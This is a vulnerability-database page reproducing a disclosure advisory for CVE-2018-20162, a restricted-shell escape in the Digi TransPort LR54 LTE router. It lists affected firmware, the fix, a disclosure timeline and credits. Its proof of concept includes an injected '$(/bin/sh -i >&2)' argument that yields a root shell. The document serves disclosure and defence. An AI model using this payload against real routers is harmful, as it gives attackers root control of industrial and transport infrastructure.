Vulners
Lucene search
Digi TransPort LR54 Restricted Shell Escape Vulnerability
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | CVE-2018-20162 | 17 Mar 201920:15 | – | cve |
 | CVE-2018-20162 | 17 Mar 201920:15 | – | cvelist |
 | EUVD-2018-12731 | 7 Oct 202500:30 | – | euvd |
 | CVE-2018-20162 | 21 Mar 201916:00 | – | nvd |
 | CVE-2018-20162 | 21 Mar 201916:00 | – | osv |
 | Digi TransPort LR54 Restricted Shell Escape | 18 Feb 201900:00 | – | packetstorm |
 | Input validation | 21 Mar 201916:00 | – | prion |
 | CVE-2018-20162 | 22 May 202507:37 | – | redhatcve |
CVE-2018-20162: Digi TransPort LR54 Restricted Shell Escape
===========================================================
The Digi TransPort LR54 is a high speed LTE router commonly used by industry,
infrastructure, retail and public transportation.
It supports running python scripts in a restricted sandbox, and has a custom
shell accessible over SSH which is subjected to the same restrictions. The
underlying OS is inaccessible to the administrator.
Iave found a way to break out of the sandbox and obtaining a root shell by
exploiting the way the cli handles command line arguments when executing python
scripts:
When an interactive python process receives a SIGINT (trough CTRL-C), arguments
to the script are not properly escaped when passed to the interactive CLIas
error logging handler. This allows an attacker to execute arbitrary commands as
root.
To exploit this vulnerability, an attacker needs to have interactive CLI access
with asupera privileges. A user with this access level is enabled by default on
the device.
Vulnerable
- ----------
Digi Transport LR54 (and maybe related products like WR64 and WR54)
Firmware Version : 4.4.0.26 10/29/2018 21:14:06
Firmware Version : 4.3.2.24 09/06/2018 00:58:34
And maybe earlier versions
Migitation
- ----------
Users should upgrade to firmware version 4.5.1.4 or newer.
Proof of Concept
- ----------------
1. Upload sleep.py to the LR54 using scp or sftp, containing:
import time;time.sleep(10)
2. Execute the following command in the LR54 cli:
python sleep.py --XXX $(/bin/sh -i >&2)
3. Immediately press CTRL-C after the program starts
4. You are then dropped to an interactive root shel
l
/home/digi/user # uname -a
Linux (none) 3.10.14 #1 SMP Mon Oct 29 16:18:10 CDT 2018 mips GNU/Linux
/home/digi/user # id
uid=0(root) gid=2000(users_rw) groups=2000(users_rw),2002(users_super)
Timeline
- --------
2018-12-13: Vulnerability discovered
2018-12-14: PoC created, Vendor notified
2018-12-14: Vendor confirmed, 60 day embargo. Applied for CVE.
2018-12-15: CVE-2018-20162 assigned
2018-12-31: Received pre-release firmware. Confirmed not vulnerable.
2019-01-02: Vendor releases fixed firmware 4.5.1.4
2019-01-25: Vendor updated release notes to reference CVE-2018-20162
2019-02-13: Vendor okaed disclosure, Embargo lifted
References
- ----------
https://www.digi.com/products/networking/cellular-routers/digi-transport-lr54
http://ftp1.digi.com/support/firmware/transport/LR54/v4.5.1.4/93001306_L.pdf
https://www.digi.com/resources/security
https://blog.hackeriet.no/cve-2018-20162-digi-lr54-restricted-shell-escape
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20162
Credits
- -------
Vulnerability discovered by Stig Palmquist.
Thanks to @duniel_pls and @alexanderkjall for reviewing this report.
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Feb 2019 00:00Current
0.3Low risk
Vulners AI Score0.3
CVSS 29
CVSS 39.9
EPSS0.03951